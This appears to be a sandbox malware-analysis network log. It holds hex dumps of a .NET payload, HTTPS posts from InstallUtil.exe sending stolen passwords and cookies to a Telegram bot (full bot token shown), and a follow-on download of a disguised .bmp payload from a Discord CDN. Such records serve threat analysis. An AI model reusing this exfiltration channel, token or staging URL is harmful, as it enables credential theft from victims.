                                                      2022-05-14 13:16:00 UTC223INData Raw: 56 76 44 1f e0 45 77 15 eb f0 80 cc f5 97 5c 2d eb 24 12 56 50 81 4b 64 2b 5d 63 56 bc 1f 1b 35 de b9 a8 7d a0 79 46 4d ba 97 16 0a 4f e7 75 c2 e0 6d a5 f0 04 2d 47 17 41 ce d1 25 b7 a4 2f 63 0f 61 3f 85 df 2f c6 25 8b 0f fb 95 3b 13 23 7c 0f 73 24 ec ab 06 5d 46 6a 5f bf 8f fd 13 c2 cd aa c9 b9 a4 d4 19 e1 79 96 ff d7 13 b9 ad 01 a2 e7 ee fb 7e 4c 86 4c be 26 f0 5e c4 a0 97 d8 e6 59 bc 5e a0 11 7c 7e b5 04 eb f9 90 c3 a6 5c 48 bd 13 ff 5d 53 70 8a 7c d9 56 91 c6 16 0d a2 d1 d6 c0 5a ed 93 74 a6 7b 89 33 32 cd 11 d5 7d b8 87 90 03 24 58 ca 57 d9 6c cd 80 bb 54 9f ef d1 8f 2b 07 20 c6 e5 80 6c b2 f8 ad 23 ff 64 81 ff f3 08 61 19 48 4a 0f b9 4f 02 1d b3 3d d1 d4 2d 17 e7 2d 2d 1e 83 eb a7 ce 6a f0 cd 1f e4 12 0c e5 d5 de ce 3e 21 dc 82 30 2b 3f 98 58 ea b0
                                                      Data Ascii: VvDEw\-$VPKd+]cV5}yFMOum-GA%/ca?/%;#|s$]Fj_y~LL&^Y^|~\H]Sp|VZt{32}$XWlT+ l#daHJO=---j>!0+?X
                                                      2022-05-14 13:16:00 UTC228INData Raw: 00 87 9d e2 ee b4 69 25 30 29 7f 83 59 2d 53 fa 17 39 ff 59 cb ee 80 b4 b3 2c 6f 5b ac f6 53 aa 37 5b 2c de 1a a5 62 14 ac 37 32 7c 94 20 dc 73 fe c4 6b de c1 1f fa 70 81 bc f7 da f0 59 f4 ae b3 02 d2 98 4a b7 b6 79 6f 76 d8 0c 12 0c 0f 8f 8a 35 d8 2c 9a bf 79 4b a5 13 3b 21 7c 7c 93 e9 5b 08 53 c2 29 96 33 1b 46 52 43 b2 ad ce cf b0 5d a8 ec 2d 8b 59 40 0b a5 da 91 6c e7 3d 7c 3c 53 6d 45 80 a5 c3 35 20 df 92 df 27 78 77 6f 05 63 3c 67 ae 3a 65 af 80 2f e5 24 75 e8 98 cb 00 5c 78 ab 19 8b ed 1f bf a6 bb 35 74 8e 27 eb e3 b9 cb 75 55 d8 ef c2 6d 66 78 87 ad 6f 55 ed 96 eb 03 2d 1b 85 f2 93 56 b5 f8 f9 08 5e f3 30 bd 87 12 8d 03 8f ab 04 ce f9 e3 85 fe b3 0c ef 41 4f 87 7d 4e ed 8b 9e f8 dd 9d 78 f2 81 e3 1b 3a 9b 74 92 5f d9 46 b8 31 25 cd 78 05 28 42 b9
                                                      Data Ascii: i%0)Y-S9Y,o[S7[,b72| skpYJyov5,yK;!||[S)3FRC]-Y@l=|<SmE5 'xwoc<g:e/$u\x5t'uUmfxoU-V^0AO}Nx:t_F1%x(B
                                                      2022-05-14 13:16:00 UTC244INData Raw: db b8 77 67 a8 2b a7 52 2c 5a 5f bb 31 13 69 7d 88 ec e3 87 0d 3a be a0 38 d2 b8 21 5c c8 90 2c 56 78 75 b8 42 db b6 23 12 bd 40 25 28 2b 3c 54 4a 17 16 f8 fa d7 00 47 cd b3 4f 1a 88 58 b2 57 c6 36 81 5b b3 31 fe 10 3d 20 29 65 91 24 e8 61 8e 7a a1 bd 2f 57 2e 83 4d bd c2 d0 63 3b 72 28 fc fa 61 d7 82 a3 07 ca 3d cd f9 a0 7e 4f 28 a1 fe 55 c2 8b 0e 9e ad 34 cb 10 b3 5c 9f 96 d4 33 ed aa 26 7a 91 92 1c 9a d0 ec 16 7b 43 2f 2e 27 69 e8 4d 67 6f 4d 21 cc ae 87 6d 21 32 69 c0 90 91 0c 99 da e7 5a 09 80 89 a8 90 d6 c4 db fd 17 72 62 40 6f 2e 92 45 f3 e5 00 43 9a 77 94 f4 1e 47 a8 06 8f 4a 6a 54 ce 49 e5 89 16 fd 26 bd 99 02 56 b6 65 ee ca 2e ac 73 0c 25 62 da 26 1c 67 6c da 25 9d d2 fd 93 fa 36 75 3c 99 e4 6c ef 2a 2f e2 1d a6 a9 db 9b cb 05 65 55 f8 9a 8e 83
                                                      Data Ascii: wg+R,Z_1i}:8!\,VxuB#@%(+<TJGOXW6[1= )e$az/W.Mc;r(a=~O(U4\3&z{C/.'iMgoM!m!2iZrb@o.ECwGJjTI&Ve.s%b&gl%6u<l*/eU
                                                      2022-05-14 13:16:00 UTC255INData Raw: 00 07 94 83 12 05 1d 01 02 00 08 18 09 18 18 09 10 4c 11 05 00 0a 98 83 12 01 01 00 06 05 1d 48 82 12 01 00 07 18 18 18 18 18 4c 11 05 00 09 08 7d 12 18 18 09 04 00 08 9c 83 12 08 01 00 06 9c 83 12 9c 83 12 01 02 00 09 08 cc 81 12 08 02 03 00 08 09 18 10 18 10 18 09 18 18 06 00 0b 18 40 11 10 48 11 09 10 09 4c 11 05 00 0d 18 09 10 4c 11 02 00 07 88 83 12 01 01 00 06 09 18 10 09 09 10 ac 80 11 18 18 4c 11 07 00 0f 09 18 8c 81 11 10 18 18 04 00 0a 05 1d 05 1d 05 1d 05 1d 03 00 0a b9 80 12 b9 80 12 01 02 00 09 84 82 12 80 82 12 29 12 29 12 29 12 08 01 06 00 10 08 08 18 02 00 05 98 80 11 84 81 11 10 18 10 80 81 11 10 4c 11 04 00 11 08 01 09 10 09 18 18 02 04 00 08 08 84 83 12 08 02 00 07 18 09 18 01 03 00 06 7d 12 18 09 18 18 04 00 08 d4 81 11 01 01 00 06 02
                                                      Data Ascii: LHL}@HLLL)))L}
                                                      2022-05-14 13:16:00 UTC271INData Raw: 61 6e 61 4d 00 6e 6f 69 74 63 65 6c 6c 6f 43 74 63 65 6a 62 4f 74 6e 65 6d 65 67 61 6e 61 4d 00 74 6e 65 6d 65 67 61 6e 61 4d 2e 6d 65 74 73 79 53 00 02 1d 7e 00 73 74 73 69 78 45 5f 74 65 67 00 02 1c 7e 00 74 78 65 4e 65 76 6f 4d 00 02 1b 7e 00 65 6c 64 6e 61 48 5f 74 65 67 00 02 1a 7e 00 73 73 65 72 64 64 41 65 73 61 42 5f 74 65 67 00 02 19 7e 00 73 6c 61 75 71 45 00 02 18 7e 00 6e 6f 73 69 72 61 70 6d 6f 43 67 6e 69 72 74 53 00 02 17 7e 00 74 6e 65 72 72 75 43 5f 74 65 67 00 02 16 7e 00 72 6f 74 61 72 65 6d 75 6e 45 49 00 72 6f 74 61 72 65 6d 75 6e 45 74 65 47 00 73 6e 6f 69 74 63 65 6c 6c 6f 43 2e 6d 65 74 73 79 53 00 65 73 61 42 6e 6f 69 74 63 65 6c 6c 6f 43 79 6c 6e 4f 64 61 65 52 00 02 15 7e 00 6e 6f 69 74 63 65 6c 6c 6f 43 65 6c 75 64 6f 4d 73 73
                                                      Data Ascii: anaMnoitcelloCtcejbOtnemeganaMtnemeganaM.metsyS~stsixE_teg~txeNevoM~eldnaH_teg~sserddAesaB_teg~slauqE~nosirapmoCgnirtS~tnerruC_teg~rotaremunEIrotaremunEteGsnoitcelloC.metsySesaBnoitcelloCylnOdaeR~noitcelloCeludoMss
                                                      2022-05-14 13:16:00 UTC287INData Raw: c0 00 09 08 09 06 bc 00 09 08 04 06 b8 00 09 07 ff 06 b4 00 09 07 fa 06 b0 00 09 07 f5 06 ac 00 09 07 f0 06 a8 00 09 07 eb 06 a4 00 09 07 e6 06 a0 00 09 07 e1 06 9c 00 09 07 dc 06 98 00 09 07 d7 06 94 00 09 07 d2 06 90 00 09 07 cd 06 8c 00 09 07 c8 06 88 00 09 07 c8 06 84 00 09 07 c3 06 80 00 09 07 c3 06 7c 00 09 07 be 06 78 00 09 07 b9 06 74 00 09 07 b4 06 70 00 09 07 af 06 6c 00 09 01 48 06 68 00 09 07 aa 06 64 00 09 00 ba 06 60 00 09 00 42 06 5c 00 09 07 a1 06 54 00 09 07 9c 06 50 00 09 07 97 06 4c 00 09 07 92 06 48 00 09 07 8d 06 44 00 09 07 88 06 40 00 09 07 83 06 3c 00 09 07 7e 06 38 00 09 07 79 06 34 00 09 07 74 06 30 00 09 07 6f 06 2c 00 09 07 6a 06 28 00 09 07 65 06 24 00 09 07 60 06 20 00 09 07 5b 06 1c 00 09 07 56 06 18 00 09 07 51 06 14 00 09
                                                      Data Ascii: |xtplHhd`B\TPLHD@<~8y4t0o,j(e$` [VQ
                                                      2022-05-14 13:16:00 UTC303INData Raw: f8 05 75 20 ea 28 e3 00 46 00 03 00 00 00 00 05 75 12 43 30 55 18 06 00 03 00 00 00 00 05 75 0b d5 30 4e 18 10 00 00 00 01 40 e8 05 75 20 e2 28 e3 00 46 00 03 00 00 00 00 05 75 12 43 30 55 18 06 00 03 00 00 00 00 05 75 0b d5 30 4e 18 10 00 00 00 01 40 d8 05 75 20 dc 28 e3 00 46 00 03 00 00 00 00 05 75 12 43 30 55 18 06 00 03 00 00 00 00 05 75 0b d5 30 4e 18 10 00 00 00 01 40 c8 05 75 20 d6 28 e3 00 46 00 03 00 00 00 00 05 75 12 43 30 55 18 06 00 03 00 00 00 00 05 75 0b d5 30 4e 18 10 00 00 00 01 40 b8 05 75 20 d0 28 e3 00 46 00 03 00 00 00 00 05 75 12 43 30 55 18 06 00 03 00 00 00 00 05 75 0b d5 30 4e 18 10 00 00 00 01 40 a8 05 75 17 31 28 e3 00 46 00 03 00 00 00 00 05 75 12 43 30 55 18 06 00 03 00 00 00 00 05 75 0b d5 30 4e 18 10 00 00 00 01 40 98 05 75
                                                      Data Ascii: u (FuC0Uu0N@u (FuC0Uu0N@u (FuC0Uu0N@u (FuC0Uu0N@u (FuC0Uu0N@u1(FuC0Uu0N@u
                                                      2022-05-14 13:16:00 UTC319INData Raw: 33 0a 4c 00 36 01 33 0a 47 00 36 01 33 0a 42 00 36 01 33 09 6f 01 a3 00 93 09 6f 00 c1 00 93 0a 1f 00 69 80 56 0a 1f 00 67 80 56 0a 1f 00 65 80 56 0a 1f 00 36 80 56 00 13 03 19 06 06 0a 02 00 67 80 56 0a 02 00 65 80 56 0a 02 00 36 80 56 00 13 03 19 06 06 0a 16 00 6b 80 56 0a 16 00 69 80 56 0a 16 00 67 80 56 0a 16 00 65 80 56 0a 16 00 36 80 56 00 13 03 19 06 06 09 6f 00 36 00 93 0a 3e 00 36 00 11 0a 3a 00 36 00 13 09 80 00 36 00 11 0a 32 00 36 00 16 0a 2d 00 36 00 36 00 13 00 36 00 06 09 6f 00 ca 00 93 0a 29 00 67 00 03 0a 29 00 65 00 03 0a 29 00 36 00 03 00 13 00 36 00 03 0a 24 00 36 00 03 09 6f 00 a6 00 93 09 16 00 36 00 01 00 13 00 36 00 01 0a 1f 00 36 00 01 08 59 00 36 00 01 08 59 00 a2 00 01 09 16 00 51 00 01 09 1e 00 36 00 01 08 59 00 a0 00 01 00 13
                                                      Data Ascii: 3L63G63B63ooiVgVeV6VgVeV6VkViVgVeV6Vo6>6:6626-666o)g)e)66$6o666Y6YQ6Y
                                                      2022-05-14 13:16:00 UTC335INData Raw: 2a 01 2b 00 00 01 36 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 35 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 34 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 33 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 32 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 31 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 30 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 2f 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 2e 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 2d 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 2c 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 2b 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 2a 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 29 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 28 20 3e f8 2b 06 00 02 99 28 2a 01 2b 00 00 01 27 20 3e f8 2b 06 00 02 99
                                                      Data Ascii: *+6 >+(*+5 >+(*+4 >+(*+3 >+(*+2 >+(*+1 >+(*+0 >+(*+/ >+(*+. >+(*+- >+(*+, >+(*++ >+(*+* >+(*+) >+(*+( >+(*+' >+
                                                      2022-05-14 13:16:00 UTC351INData Raw: ff ff 44 38 04 ff ff ff 3d 38 02 ff ff ff 36 38 03 ff ff ff 2d 38 06 ff ff ff 2d 38 0a 2a 46 58 1c 06 00 2b 52 46 58 1a 06 58 1c 06 54 01 00 00 9b a5 9a 19 07 05 7a 0a 00 01 2a 73 06 00 02 d8 28 04 00 05 6a 7e 10 2c 46 58 1b 06 52 01 fe 16 46 58 1a 06 58 1b 06 52 01 00 00 9e a5 06 00 01 a0 28 08 04 11 01 12 17 09 16 58 1a 06 04 13 06 00 02 cc 28 02 00 00 4c d0 04 00 05 65 7e 0d 06 00 02 9d 28 06 66 ad 05 20 04 00 04 56 7e 00 00 00 a5 38 00 00 00 a0 38 06 66 c2 14 20 04 00 04 56 7e 00 00 00 a9 38 a2 01 00 00 9b 8c 4b 00 00 00 af 38 19 25 a2 01 00 00 9b 8c 00 00 00 b6 38 18 25 a2 01 00 00 3a 8c 00 00 00 bd 38 17 25 a2 01 00 00 19 8c 00 00 00 c4 38 16 25 01 00 00 01 8d 1a 54 16 00 00 00 cd 38 00 26 00 00 00 ce 39 16 e0 0f fe 1d 11 00 00 11 00 00 01 12 00 07
                                                      Data Ascii: D8=868-8-8*FX+RFXXTz*s(j~,FXRFXXR(X(Le~(f V~88f V~8K8%8%:8%8%T8&9
                                                      2022-05-14 13:16:00 UTC367INData Raw: 0a 11 58 0d 1f 06 0c 13 0a 00 01 07 7e 0a 13 02 00 00 21 a5 0a 00 00 57 28 0a 00 00 01 28 02 00 00 21 d0 0b 11 00 0b 13 ff ff ff 01 39 1e 0a 00 00 54 28 58 6a 04 00 02 5e 7b 06 11 0a 00 00 55 28 04 11 1d 2c 46 58 0c 1f 06 52 0a 00 00 43 28 0a 00 01 04 7e 0b 11 58 0c 1f 06 ff ff ff 5f 3a 46 58 0b 1f 06 52 04 fe 04 00 02 5f 7b 06 11 4a 58 1a 06 58 0b 1f 06 54 58 17 4a 58 1a 06 58 1a 06 00 0b 13 0a 00 00 54 28 58 5a 6a 4a 58 1a 06 6a 0a 00 00 56 28 02 00 00 21 8c 0a 11 58 6a 04 00 02 5e 7b 06 11 0a 00 00 55 28 ff ff ff 06 3a 16 04 11 31 2c 46 58 0a 1f 06 52 0a 00 01 3c 28 08 11 0a 00 00 75 28 0d 11 58 0a 1f 06 0d 13 0a 00 00 54 28 58 e9 2c 15 5a 6a 4a 58 1a 06 6a 0a 00 00 56 28 02 00 00 21 8c 0a 11 58 6a 04 00 02 5e 7b 06 11 0a 00 00 55 28 04 11 00 00 00 00
                                                      Data Ascii: X~!W((!9T(Xj^{U(,FXRC(~X_:FXR_{JXXTXJXXT(XZjJXjV(!Xj^{U(:1,FXR<(u(XT(X,ZjJXjV(!Xj^{U(
                                                      2022-05-14 13:16:00 UTC383INData Raw: 28 ff ff fe ff 38 06 ff ff fe ff 38 0a 2a 00 de 00 00 26 ff ff ff 4c 38 0b ff ff ff 4d 38 06 00 03 02 28 ff ff ff 52 38 06 00 03 02 28 ff ff ff 57 38 06 00 02 88 28 29 de 00 00 00 06 00 01 59 28 00 06 00 01 bf 28 00 0e 2c 46 58 17 06 52 01 fe 16 0a 00 01 2e 6f 07 08 58 17 06 00 0a 00 01 2d 6f a2 06 00 02 9d 28 06 66 bb e0 20 04 00 04 56 7e 18 25 a2 06 00 03 02 28 06 00 02 5b 6f 06 00 00 ca 28 04 00 05 92 7e 17 25 a2 0a 00 00 21 6f 0a 00 00 85 28 06 00 02 9d 28 06 66 bb e0 20 04 00 04 56 7e 26 10 2d 25 06 00 02 74 6f 06 00 02 3f 6f 06 00 00 ca 28 16 25 01 00 00 15 8d 19 08 0c 0a 00 01 2c 73 00 00 00 ae 38 00 00 00 a9 38 00 00 00 a4 38 00 00 00 9f 38 04 00 05 90 7e 04 00 05 92 7e 00 00 00 00 00 d9 38 05 2c 46 00 00 01 02 38 52 01 fe 16 00 00 01 01 38 00 00
                                                      Data Ascii: (88*&L8M8(R8(W8()Y((,FXR.oX-o(f V~%([o(~%!o((f V~&-%to?o(%,s8888~~8,F8R8
                                                      2022-05-14 13:16:00 UTC399INData Raw: 00 03 5c 28 04 00 02 44 7b 12 11 09 11 04 00 05 e6 7e 1a 13 06 00 03 5c 28 04 00 02 44 7b 12 11 0b 11 04 00 05 e6 7e 00 00 00 00 85 39 46 58 26 1f 06 52 06 00 03 0b 28 06 00 02 9d 28 06 66 c0 a3 20 04 00 04 56 7e 06 00 00 26 28 12 12 04 00 05 b1 7e 58 26 1f 06 12 13 02 00 00 1c a5 06 00 03 59 28 06 00 02 cc 28 02 00 00 1c d0 04 00 05 65 7e 06 00 03 5c 28 5a 06 00 03 56 28 02 00 00 1c 8c 12 11 04 00 05 e3 7e 4a 58 1e 06 11 11 04 00 05 e5 7e 04 00 05 e4 7e 00 00 00 01 02 38 54 16 58 1e 06 02 00 00 1c 15 fe 12 12 11 13 06 00 03 5c 28 06 00 02 cf 28 06 00 02 cc 28 02 00 00 17 d0 04 00 05 65 7e 04 00 05 66 7e 06 00 03 5c 28 04 00 01 da 7b 0c 11 0b 11 04 00 05 e5 7e 04 00 05 e5 7e 10 13 02 00 00 1b a5 06 00 03 59 28 06 00 02 cc 28 02 00 00 1b d0 04 00 05 65 7e
                                                      Data Ascii: \(D{~\(D{~9FX&R((f V~&(~X&Y((e~\(ZV(~JX~~8TX\(((e~f~\({~~Y((e~


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.349774149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-05-14 13:16:47 UTC408OUTPOST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=---------------------------8da35bfc9e9f2a6
                                                      Host: api.telegram.org
                                                      Content-Length: 1020
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      2022-05-14 13:16:47 UTC408INHTTP/1.1 100 Continue
                                                      2022-05-14 13:16:47 UTC408OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 66 63 39 65 39 66 32 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 38 38 32 37 36 33 30 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 62 66 63 39 65 39 66 32 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 37 38 33 38 37 35 0a 4f 53 46 75 6c 6c
                                                      Data Ascii: -----------------------------8da35bfc9e9f2a6Content-Disposition: form-data; name="chat_id"5388276304-----------------------------8da35bfc9e9f2a6Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/783875OSFull
                                                      2022-05-14 13:16:47 UTC409INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Sat, 14 May 2022 13:16:47 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 636
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      {"ok":true,"result":{"message_id":479,"from":{"id":5351864471,"is_bot":true,"first_name":"Maryland","username":"marymekbot"},"chat":{"id":5388276304,"first_name":"Mary","last_name":"Bethel","username":"marybethel59","type":"private"},"date":1652534207,"document":{"file_name":"user-783875 2022-05-14 03-37-39.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIB32J_q78F8jTvxM_gfFkK962Oft4wAAJrDAAC5M8AAVCt3q98xOYDVyQE","file_unique_id":"AgADawwAAuTPAAFQ","file_size":450},"caption":"New PW Recovered!\n\nUser Name: user/783875\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      2192.168.2.349776149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-05-14 13:16:49 UTC410OUTPOST /bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=---------------------------8da35c0aab288a2
                                                      Host: api.telegram.org
                                                      Content-Length: 1895
                                                      Expect: 100-continue
                                                      2022-05-14 13:16:49 UTC411INHTTP/1.1 100 Continue
                                                      2022-05-14 13:16:49 UTC411OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 63 30 61 61 62 32 38 38 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 38 38 32 37 36 33 30 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 33 35 63 30 61 61 62 32 38 38 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 37 38 33 38 37 35 0a 4f 53
                                                      Data Ascii: -----------------------------8da35c0aab288a2Content-Disposition: form-data; name="chat_id"5388276304-----------------------------8da35c0aab288a2Content-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/783875OS
                                                      2022-05-14 13:16:49 UTC412OUTData Raw: 1a 43 6a ef 66 e7 7d 47 8d 18 a4 7a ce 54 89 4c d5 14 c9 2c 50 b3 3e 98 8c 45 3a 93 12 ae 7e 30 61 41 6c cf 51 10 db 53 10 08 d4 38 8b bd 61 1f 87 b4 6c 2f d9 43 77 a5 ad 66 65 25 c7 f4 99 b4 9c 5f 0a b2 98 7f 28 da c9 95 78 3d 1e 6e b8 6e 66 15 65 08 53 ec e8 f8 cb fa b1 73 aa ed 95 11 ed 88 b5 bf 1a 8e b7 be 12 2e e8 58 be 3b 1b e3 91 0d e1 78 17 5e 2f 75 05 f1 fd 61 28 a8 1e a8 72 14 7b 43 9e f9 ba 65 b7 20 8b f6 d5 de db 2f b2 d7 b7 db 8a bc f0 15 12 7e 15 2e 59 37 00 00 00 00 00 00 00 00 00 3c 95 56 f0 7c a8 7c e6 bc 46 d5 33 86 c2 b4 9e 34 91 07 ed 43 17 3d 2b 36 3c e3 e0 7d e5 0f 53 65 1c ef 2f cf 64 14 43 a6 4c 61 39 5a 23 2e 46 f6 fe 7f 12 09 93 c2 0d e1 ca bf fd 5f 00 00 00 00 00 00 00 00 00 b0 20 1f 1f e2 e6 39 05 e0 97 f0 3e 2e ff ec 28 e5 fd
                                                      Data Ascii: Cjf}GzTL,P>E:~0aAlQS8al/Cwfe%_(x=nnfeSs.X;x^/ua(r{Ce /~.Y7<V||F34C=+6<}Se/dCLa9Z#.F_ 9>.(
                                                      2022-05-14 13:16:49 UTC412INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Sat, 14 May 2022 13:16:49 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 646
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      {"ok":true,"result":{"message_id":480,"from":{"id":5351864471,"is_bot":true,"first_name":"Maryland","username":"marymekbot"},"chat":{"id":5388276304,"first_name":"Mary","last_name":"Bethel","username":"marybethel59","type":"private"},"date":1652534209,"document":{"file_name":"user-783875 2022-05-14 03-44-22.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIB4GJ_q8G5YZ2FtgXpeB7iNKzY9rxJAAJsDAAC5M8AAVAmq1xgvEleWiQE","file_unique_id":"AgADbAwAAuTPAAFQ","file_size":1316},"caption":"New Cookie Recovered!\n\nUser Name: user/783875\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      3192.168.2.349779162.159.133.233443C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-05-14 13:17:12 UTC413OUTGET /attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp HTTP/1.1
                                                      Host: cdn.discordapp.com
                                                      Connection: Keep-Alive
                                                      2022-05-14 13:17:12 UTC414INHTTP/1.1 200 OK
                                                      Date: Sat, 14 May 2022 13:17:12 GMT
                                                      Content-Type: image/x-ms-bmp
                                                      Content-Length: 416768
                                                      Connection: close
                                                      CF-Ray: 70b3e9a91b725bdd-FRA
                                                      Accept-Ranges: bytes
                                                      Age: 83416
                                                      Cache-Control: public, max-age=31536000
                                                      Content-Disposition: attachment;%20filename=Idksgm_Umgkodlw.bmp
                                                      ETag: "c4adc7c987e700a85f16c250fb6e6e03"
                                                      Expires: Sun, 14 May 2023 13:17:12 GMT
                                                      Last-Modified: Fri, 13 May 2022 13:36:28 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: HIT
                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                      x-goog-generation: 1652448988027717
                                                      x-goog-hash: crc32c=TuJfbQ==
                                                      x-goog-hash: md5=xK3HyYfnAKhfFsJQ+25uAw==
                                                      x-goog-metageneration: 1
                                                      x-goog-storage-class: STANDARD
                                                      x-goog-stored-content-encoding: identity
                                                      x-goog-stored-content-length: 416768
                                                      X-GUploader-UploadID: ADPycdscSd6oC8GbGCX6htPZTy8OjzgUlT7J2mqtIVAo3Ipln5m_O6IIVCBEGI5gYDzTygFYU2kqSGfMaBl-8Ag9Tnud6g
                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7FNTqFQsYOpDDZ5JnmZ8mAnBRANTckivCKLrA%2Blin%2B%2BDmpaz%2BDs15h3gtpTcgBavn%2FzyOT%2F4GcXCrubuFTNR%2FqO9bGJInDdAYHPDC51YPSRmIYbkJLBfzfJFc4Xipp5qnKFNCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      2022-05-14 13:17:12 UTC415INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
